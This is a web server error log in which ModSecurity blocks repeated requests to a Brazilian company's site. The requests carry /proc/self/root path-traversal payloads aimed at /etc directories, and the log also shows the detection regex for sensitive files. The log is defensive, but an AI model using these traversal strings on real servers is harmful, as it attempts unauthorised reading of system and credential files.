[Wed Mar 18 10:56:23.055636 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:52278] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvB-oXxyEfFpUF8f9vhwAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/var/run/initramfs/state/etc
[Wed Mar 18 10:56:25.906900 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:58864] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvCfu8EFLIOrSqIpsGGwAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:56:27.244936 2026] [:error] [pid 31803:tid 140411590858496] [client 74.7.243.128:58878] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvC-yqAr6etmhZHNrCmAAAAFI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:57:16.982991 2026] [:error] [pid 29882:tid 140411649607424] [client 74.7.243.128:58882] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvPEzinOy1jxa1j4cXywAAAQs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:57:22.745768 2026] [mime_magic:error] [pid 11816:tid 140411683178240] (70014)End of file found: [client 57.141.18.77:55858] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 10:57:36.943821 2026] [:error] [pid 17887:tid 140411683178240] [client 74.7.241.31:53796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvUAkwaGbbGflqUZAStgAAAMc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:57:47.926517 2026] [:error] [pid 17653:tid 140411557287680] [client 74.7.243.128:59824] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvW8df6f5d65gmYZTX5wAAAtY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:57:49.223720 2026] [:error] [pid 31803:tid 140411733534464] [client 74.7.243.128:59892] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvXeyqAr6etmhZHNrC4QAAAEE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:58:13.367369 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:57162] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvddY0UrI5A3LftIysJgAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:58:14.896645 2026] [:error] [pid 11816:tid 140411683178240] [client 74.7.243.128:50666] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvduw_le52K8_3pV3iUQAAAgc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:58:27.503224 2026] [:error] [pid 29882:tid 140411607643904] [client 74.7.243.128:50680] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvg0zinOy1jxa1j4cX9QAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:58:28.941161 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.243.128:52748] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvhNa6ubjKNq_cu4ac3AAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:58:30.331444 2026] [:error] [pid 15051:tid 140411574073088] [client 74.7.243.128:38238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvhimAPhZkrhU8w4lvvAAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:59:06.431822 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.241.31:59980] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvqtY0UrI5A3LftIysdAAAAYY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:59:33.626301 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.31:56982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqvxdY0UrI5A3LftIyspQAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 10:59:44.598355 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:38244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqv0OyqAr6etmhZHNrDWwAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 10:59:58.217843 2026] [:error] [pid 15051:tid 140411716749056] [client 74.7.241.31:44732] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqv3imAPhZkrhU8w4lwAAAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 11:01:00.433810 2026] [mime_magic:error] [pid 31803:tid 140411708356352] (70014)End of file found: [client 57.141.18.89:34552] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:01:10.759459 2026] [:error] [pid 31803:tid 140411616036608] [client 216.73.216.191:53084] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //usr/share/zoneinfo/etc/gmt 4"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwJuyqAr6etmhZHNrDjwAAAE8"]
[Wed Mar 18 11:01:17.677769 2026] [mime_magic:error] [pid 11816:tid 140411590858496] (70014)End of file found: [client 57.141.18.100:35302] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 11:01:30.847630 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:39584] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwOta6ubjKNq_cu4adiQAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:01:33.195774 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:55334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwPdY0UrI5A3LftIytZQAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:01:35.719241 2026] [:error] [pid 17653:tid 140411716749056] [client 74.7.243.128:55336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwP8df6f5d65gmYZTYhAAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 11:01:42.055638 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.243.128:55346] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqwRuw_le52K8_3pV3i0QAAAhE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
